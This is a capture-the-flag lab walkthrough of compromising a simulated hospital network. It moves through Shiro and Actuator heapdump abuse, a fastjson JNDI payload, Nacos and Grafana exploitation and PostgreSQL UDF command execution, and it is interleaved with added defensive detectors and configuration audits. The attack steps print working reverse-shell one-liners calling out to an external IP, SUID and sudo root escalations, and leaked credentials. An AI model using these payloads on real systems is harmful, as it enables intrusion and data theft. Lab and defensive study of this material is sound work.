春秋云镜-Hospital


zzdzz, 3 December 2025

References

https://blog.csdn.net/uuzeray/article/details/143355454
https://h0ny.github.io/posts/Hospital-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/
https://fushuling.com/index.php/2024/01/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-hospital/

Entry host

39.99.156.20

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.99.156.20

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.156.20:8080 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://39.99.156.20:8080  code:302 len:0      title:None 跳转url: http://39.99.156.20:8080/login;jsessionid=5F7F0F21ABF706D2CC9C0C11E2BEED46
[*] WebTitle http://39.99.156.20:8080/login;jsessionid=5F7F0F21ABF706D2CC9C0C11E2BEED46 code:200 len:2005   title:医疗管理后台
[+] PocScan http://39.99.156.20:8080 poc-yaml-spring-actuator-heapdump-file
已完成 1/1
[*] 扫描结束,耗时: 15.4116903s

The scan reports a heapdump leak; download it and decode it.

http://39.99.156.20:8080/actuator/heapdump

JDumpSpider-1.1-SNAPSHOT-full.jar

The heap dump leaks the Shiro key:

GAYysgMQhG7/CzIJlVpR2g==

Use a Shiro exploitation tool.

Inject an in-memory webshell directly.

Godzilla cannot connect, but AntSword can.

Not enough privileges; try privilege escalation.
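From the defender's side, both steps above leave a trace in the web server's access log: a 200 on /actuator/heapdump (or /actuator/env) means the Actuator endpoint is reachable without authentication, and a Shiro rememberMe cookie that is kilobytes long is a serialized payload rather than a real remember-me token. The following detector is an added example, not part of the original writeup; the log format and the sample lines are constructed.

```python
"""Detection over web access logs for the two entry-point issues in this writeup:
an exposed Spring Boot Actuator endpoint (heapdump) and abuse of the Shiro
rememberMe cookie. Added example; log format and sample lines are constructed."""
import re
from collections import namedtuple

# Assumed (constructed) log format: <client> "<method> <path>" <status> rememberMe_len=<n>
# where n is the byte length of the rememberMe cookie, or -1 when the cookie is absent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) rememberMe_len=(?P<rm>-?\d+)$'
)

# Actuator endpoints that disclose memory or configuration; /actuator/health may stay reachable.
SENSITIVE_ACTUATOR = {"heapdump", "env", "configprops", "threaddump", "logfile", "mappings", "beans"}
# A genuine rememberMe cookie is a few hundred bytes; a serialized gadget chain is far larger.
REMEMBERME_MAX = 1024

Alert = namedtuple("Alert", "ip reason path")


def analyze(lines):
    """Return one Alert per suspicious request, in log order."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than crash the detector
        path = m["path"].split("?", 1)[0]
        # drop ";jsessionid=..." path parameters before comparing segments
        segments = [seg.split(";", 1)[0] for seg in path.split("/")]
        # assumes the default base path; management.endpoints.web.base-path can change it
        if len(segments) >= 3 and segments[1] == "actuator" and segments[2] in SENSITIVE_ACTUATOR:
            reason = "actuator-sensitive-endpoint-exposed" if m["status"] == "200" else "actuator-probe"
            alerts.append(Alert(m["ip"], reason, path))
        if int(m["rm"]) > REMEMBERME_MAX:
            alerts.append(Alert(m["ip"], "oversized-rememberMe-cookie", path))
    return alerts


# Constructed sample log lines (addresses from documentation ranges)
SAMPLE_LOG = [
    '203.0.113.10 "GET /login;jsessionid=ABC" 200 rememberMe_len=-1',
    '203.0.113.10 "GET /actuator/heapdump" 200 rememberMe_len=-1',
    '203.0.113.10 "GET /actuator/health" 200 rememberMe_len=-1',
    '203.0.113.11 "GET /" 302 rememberMe_len=4210',
    '198.51.100.7 "GET /index" 200 rememberMe_len=212',
    '203.0.113.12 "GET /actuator/env" 404 rememberMe_len=-1',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The 404 on /actuator/env is reported as a probe rather than an exposure: in a real deployment the 200 responses are the ones that need a same-day fix (restrict management.endpoints.web.exposure.include, or put the management port behind authentication), while the probes tell you who was looking.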

find / -perm -u=s -type f 2>/dev/null

First get a reverse shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.115.130.26",250));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

Then spawn a tty:

python3 -c 'import pty; pty.spawn("/bin/bash")'

vim.basic is SUID; use it to read flag1:

vim.basic /root/flag/flag01.txt
flag01: flag{62fcd7a5-f916-412d-b6ed-316cf7ed6def}

Escalate to root with vim.basic:

/usr/bin/vim.basic  -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
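The SUID bit on vim.basic is the whole privilege-escalation story on this host: any editor or interpreter with that bit set is root for every local user. An added example (not from the original writeup) of the check a host-hardening job would run over the output of the find command above, comparing it to a baseline. The baseline list and the sample find output are constructed assumptions; adjust the baseline to the image you actually ship.

```python
"""Baseline check for SUID binaries. Added example, not from the original writeup.
Input is the output of `find / -perm -u=s -type f 2>/dev/null`; sample is constructed."""
import os
import re

# Assumed baseline of SUID binaries on a stock Debian/Ubuntu host; tune per image.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}
# Editors, interpreters and pagers can spawn a shell or read/write arbitrary files;
# a SUID bit on any of them is an immediate root for every local user.
SHELL_CAPABLE = {"vim", "vim.basic", "vi", "nano", "python", "perl", "find", "bash", "sh",
                 "less", "more", "awk", "env"}


def normalize(name):
    """Strip version suffixes so python3.8 and python3 both map to 'python'."""
    return re.sub(r"[\d.]+$", "", name)


def audit_suid(find_output):
    """Return [(path, severity)] for every SUID file that is not in the baseline.
    severity is 'critical' for shell-capable programs and 'review' otherwise."""
    findings = []
    for raw in find_output.splitlines():
        path = raw.strip()
        if not path.startswith("/"):
            continue  # ignore stray lines (errors, prompts)
        if path in BASELINE:
            continue
        name = os.path.basename(path)
        if name in SHELL_CAPABLE or normalize(name) in SHELL_CAPABLE:
            findings.append((path, "critical"))
        else:
            findings.append((path, "review"))
    return findings


# Constructed sample output of the find command
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/vim.basic
/usr/bin/mount
/usr/local/bin/backup-helper
/usr/bin/python3.8
"""

if __name__ == "__main__":
    for path, severity in audit_suid(SAMPLE_FIND_OUTPUT):
        print(f"{severity:8} {path}")
```

Anything rated critical is fixed with chmod u-s; anything rated review needs an owner who can explain why the binary must run as root at all.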

Upload fscan and scan the internal network:

app@web01:/tmp$ ./fscan -h 172.30.12.5/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.5     is alive
(icmp) Target 172.30.12.6     is alive
(icmp) Target 172.30.12.236   is alive
[*] Icmp alive hosts len is: 3
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=E4E7691933F20ACA296077BADF74DECE
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=E4E7691933F20ACA296077BADF74DECE code:200 len:2005   title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 

172.30.12.6:8848(nacos/flag02)

Set up a tunnel/proxy.

Again, try the tool first:

java -jar .\NacosExploitGUI_v4.0.jar

First log in with the weak default password and take a look.

Database credentials are found in the configuration:

username: root
password: P@ssWord!!!

The database was not found in the earlier scan, so there must be another internal network segment.

A shell is still needed; try the deserialization exploit.

G:\tool\nacos\NacosExploitGUI-main\NacosExploitGUI-main\漏洞复现环境\nacos-client_yaml_deserialize\yaml-payload

Change the command to one that creates an administrator account.

Then double-click the .bat to generate the payload in one step.

Host it on machine 1 (172.30.12.5):

python3 -m http.server 7000

The tool is a bit buggy; retry a few times.

flag02: flag{8e585cb2-5ec1-4840-8fb0-8aec5548261d}
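Both footholds so far come from shipped configuration that was never tightened: the Spring Boot Actuator exposure on the entry host and, on the Nacos server, authentication left disabled (plus the User-Agent whitelist behind the v1 auth bypass and the default account's password). As an added example, not part of the original writeup, this is a small .properties audit that flags those settings; the property keys are the real Spring Boot and Nacos keys, and the two sample files are constructed. It covers both products in one pass so it can run over a mixed configuration repository.

```python
"""Audit Spring Boot / Nacos .properties files for the weak settings this writeup exploits.
Added example; sample configurations are constructed."""

# Actuator endpoints whose exposure leaks memory, environment or configuration.
SENSITIVE_ENDPOINTS = {"heapdump", "env", "configprops", "threaddump", "logfile", "mappings"}


def parse_properties(text):
    """Minimal Java .properties parser: key=value or key: value, # and ! comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            key, sep, value = line.partition(":")
        props[key.strip()] = value.strip()
    return props


def audit_properties(text):
    """Return a list of finding identifiers; an empty list means nothing was flagged."""
    p = parse_properties(text)
    findings = []

    if any(k.startswith("management.") for k in p):
        # Spring Boot 2.x exposes only health/info over HTTP unless include says otherwise.
        include = {s.strip() for s in p.get("management.endpoints.web.exposure.include", "health").split(",")}
        exclude = {s.strip() for s in p.get("management.endpoints.web.exposure.exclude", "").split(",") if s.strip()}
        exposed = sorted(e for e in SENSITIVE_ENDPOINTS if ("*" in include or e in include) and e not in exclude)
        if exposed:
            findings.append("actuator-sensitive-exposed:" + ",".join(exposed))

    if any(k.startswith("nacos.") for k in p):
        # Nacos shipped with auth off; the console/API is then open to anyone who can reach 8848.
        if p.get("nacos.core.auth.enabled", "false").lower() != "true":
            findings.append("nacos-auth-disabled")
        # The legacy User-Agent whitelist lets a spoofed server agent skip auth entirely.
        if p.get("nacos.core.auth.enable.userAgentAuthWhite", "false").lower() == "true":
            findings.append("nacos-useragent-whitelist-bypass")
        # A missing or short JWT secret is as bad as no auth. NOTE: the value Nacos ships as a
        # default is public and must also be replaced; that comparison is not done here.
        if len(p.get("nacos.core.auth.default.token.secret.key", "")) < 32:
            findings.append("nacos-token-secret-missing-or-short")

    return findings


# Constructed weak configuration (what the two targets in this writeup effectively ran)
WEAK_PROPERTIES = """\
management.endpoints.web.exposure.include=*
nacos.core.auth.enabled=false
nacos.core.auth.enable.userAgentAuthWhite=true
"""

# Constructed hardened configuration; the secret and identity values are placeholders
HARDENED_PROPERTIES = """\
management.endpoints.web.exposure.include=health,info
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=false
nacos.core.auth.default.token.secret.key=PLACEHOLDER_BASE64_SECRET_AT_LEAST_32_BYTES_LONG_xxxxxxx
nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=PLACEHOLDER_IDENTITY_VALUE
"""

if __name__ == "__main__":
    print("weak:    ", audit_properties(WEAK_PROPERTIES))
    print("hardened:", audit_properties(HARDENED_PROPERTIES))
```

The audit says nothing about the default nacos account password, which lives in the database rather than the properties file; that has to be rotated separately, and the database credentials stored in Nacos configuration (as found above) should be treated as compromised once the console has been reachable without auth.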

172.30.12.236:8080(jndi/flag03)

Now attack the other host, web3.

Set up a SOCKS proxy in Burp.

The application sends data as JSON.

Use the Burp plugin: https://github.com/amaz1ngday/fastjson-exp

Use FastjsonEcho directly to get flag3.

Hmm, the request can't be captured.

Switch approach: start an RMI server with jndi_tool and send the JdbcRowSetImpl payload.

java -cp jndi_tool.jar jndi.EvilRMIServer 2099 7777 "bash -i >& /dev/tcp/172.30.12.5/4321 0>&1"
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://172.30.12.5:2099/Object",
        "autoCommit":true
    }
}

Got flag03:

flag03: flag{bec6cf43-a362-49d8-b0b2-c70590fffe6f}
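The payload above works because fastjson's autoType honours the "@type" key and instantiates com.sun.rowset.JdbcRowSetImpl, whose dataSourceName triggers a JNDI lookup. An added example, not from the original writeup, of an input filter a gateway or controller can apply before the body ever reaches fastjson: it walks the parsed document and rejects any object that carries "@type", including keys smuggled as unicode escapes. The sample bodies reuse the page's JSON and are constructed. The real fix on the Java side is upgrading fastjson and enabling its safeMode (ParserConfig.getGlobalInstance().setSafeMode(true), available from 1.2.68; an assumption about the version in use here), which disables autoType outright; the filter below is defence in depth for the period before that deployment.

```python
"""Reject JSON bodies that carry fastjson's autoType key anywhere in the document.
Added example; the sample bodies are constructed (the first reuses the page's payload)."""
import json

FASTJSON_TYPE_KEY = "@type"


def find_type_keys(obj, path="$"):
    """Recursively collect (json_path, value) for every '@type' key, at any depth."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = f"{path}.{key}"
            if key == FASTJSON_TYPE_KEY:
                hits.append((here, value))
            hits.extend(find_type_keys(value, here))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            hits.extend(find_type_keys(value, f"{path}[{index}]"))
    return hits


def reject_autotype(body):
    """Return (accepted, reasons). Fails closed: malformed JSON is rejected too,
    since fastjson accepts non-standard input that a strict parser cannot vet."""
    try:
        obj = json.loads(body)
    except ValueError as exc:
        return False, [f"invalid json: {exc}"]
    hits = find_type_keys(obj)
    if hits:
        return False, [f"{path} -> {value}" for path, value in hits]
    return True, []


# The payload from the writeup, as a constructed sample input
PAYLOAD = """{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://172.30.12.5:2099/Object",
        "autoCommit":true
    }
}"""

# Same key written with a unicode escape; json.loads decodes it, so it is still caught
ESCAPED = '{"\\u0040type":"java.lang.Class","val":"x"}'

BENIGN = '{"patientId": 42, "notes": ["a", "b"], "meta": {"@version": 1}}'

if __name__ == "__main__":
    for name, body in (("payload", PAYLOAD), ("escaped", ESCAPED), ("benign", BENIGN)):
        print(name, reject_autotype(body))
```

Note that "@version" in the benign body is not flagged: the comparison is on the exact key fastjson uses, not on any key starting with "@".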

flag04

The host has two network interfaces.

Upload fscan and scan the internal network.

I hosted it on the .12.5 machine and fetched it with wget.

root@web03:/tmp# ./fscan -h 172.30.54.1/24 -o 1.txt
./fscan -h 172.30.54.1/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.30.54.179   is alive
(icmp) Target 172.30.54.12    is alive
[*] Icmp alive hosts len is: 2
172.30.54.12:3000 open
172.30.54.179:8080 open
172.30.54.12:5432 open
172.30.54.12:22 open
172.30.54.179:22 open
172.30.54.179:8009 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.54.12:3000  code:302 len:29     title:None 跳转url: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909  title:Grafana

The scan finds a Grafana instance.

The new assets are on a different segment from before, so a multi-layer proxy is needed.

Run frps on web1:

[common]
bind_port = 1000

Run frpc on web3:

[common]
tls_enable = true
server_addr = 172.30.12.5
server_port = 1000

[plugin_socks5]
type = tcp
remote_port = 2000
plugin = socks5

Upload the batch of tools.

For convenience, change the password.

Now web3 can be reached directly.

The Grafana tool extracts the PostgreSQL database credentials:

root@web03:~# ./linux_amd64_grafanaExp exp -u http://172.30.54.12:3000
2025/11/04 17:39:05 Target vulnerable has plugin [alertlist]
2025/11/04 17:39:05 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2025/11/04 17:39:05 There are [1] records in data_source table.
2025/11/04 17:39:05 type:[postgres]     name:[PostgreSQL]               url:[localhost:5432]    user:[postgres] password[Postgres@123]       database:[postgres]     basic_auth_user:[]      basic_auth_password:[]
2025/11/04 17:39:05 All Done, have nice day!

Recovered credentials: postgres / Postgres@123

Multiple proxy hops are needed here, so a different tool is used.

See this article: https://fushuling.com/index.php/2023/09/21/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba/

The idea: start the controller on the VPS and the client on the machine with outbound access; once the client connects, the controller opens a port on that machine for the internal hosts to connect through.

Finally:

proxychains4 -q psql -h 172.30.54.12 -U postgres -W

Change the password (psql is needed later for privilege escalation, so change the root role's password first):

ALTER USER root WITH PASSWORD '123456';

Create a command-execution function:

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

Perl reverse shell (back to web3):

select system('perl -e \'use Socket;$i="172.30.54.179";$p=250;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
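Everything from ALTER USER onward only works because the credential recovered from Grafana belongs to a superuser: CREATE FUNCTION ... LANGUAGE c is superuser-only, so a datasource role with plain SELECT rights would have stopped the chain at the psql prompt. For the cases where that is not fixed yet, an added example (not from the original writeup) of detection logic over PostgreSQL server logs, which needs log_statement set to 'ddl' or 'all'. The log line format follows the server's default prefix layout but the sample lines are constructed; the CREATE FUNCTION statement is the one from this page.

```python
"""Flag dangerous statements in PostgreSQL logs: C-language UDF creation, binding of
libc's system(), role password changes, and file/program access primitives.
Added example; log lines are constructed."""
import re

# Assumed log line layout: <timestamp> [<pid>] <user>@<db> LOG:  statement: <sql>
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement:\s*(?P<sql>.*)$"
)

# Rule order is the reporting order; a single statement may match several rules.
RULES = [
    ("c-language-udf",
     re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+'?(?:c|internal)'?(?!\w)", re.I | re.S)),
    ("libc-system-binding",
     re.compile(r"\bAS\s+'[^']*libc\.so[^']*'\s*,\s*'system'", re.I)),
    ("role-password-change",
     re.compile(r"\bALTER\s+(?:USER|ROLE)\b.*\bPASSWORD\b", re.I | re.S)),
    ("program-or-file-access",
     re.compile(r"\bFROM\s+PROGRAM\b|\bpg_read_file\s*\(|\blo_import\s*\(", re.I)),
]


def detect(lines):
    """Return a list of {'rule', 'user', 'db', 'pid', 'sql'} for every matching statement."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a statement line (duration, connection, error...)
        sql = m["sql"]
        for rule, pattern in RULES:
            if pattern.search(sql):
                findings.append({"rule": rule, "user": m["user"], "db": m["db"],
                                 "pid": m["pid"], "sql": sql})
    return findings


# Constructed sample log; the third statement is the function definition from this writeup.
SAMPLE_PG_LOG = [
    "2025-11-04 17:40:01.120 UTC [2231] postgres@postgres LOG:  statement: SELECT * FROM patients WHERE id = 42;",
    "2025-11-04 17:40:09.433 UTC [2231] postgres@postgres LOG:  statement: ALTER USER root WITH PASSWORD '123456';",
    "2025-11-04 17:40:15.901 UTC [2231] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;",
    "2025-11-04 17:40:20.005 UTC [2231] postgres@postgres LOG:  statement: SELECT system('id');",
    "2025-11-04 17:41:02.310 UTC [2240] app@hospital LOG:  statement: COPY notes FROM PROGRAM 'cat /etc/hostname';",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_PG_LOG):
        print(f"{f['rule']:24} {f['user']}@{f['db']} pid={f['pid']}")
```

The SELECT system('id') line is deliberately not flagged: once the function exists, its calls look like any other query, which is why the detection keys on the CREATE FUNCTION and why the lasting fix is to query pg_roles for rolsuper and strip superuser from every application and datasource role.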

The last step is also a trap.

sudo -l shows that psql is allowed.

psql privilege escalation: psql | GTFOBins

sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash    (type it while the help output is still in the pager; do not wait for more to finish)
cat /root/flag/flag04.txt
flag04: flag{46a691c2-a371-4954-b77c-277de02b1c49}
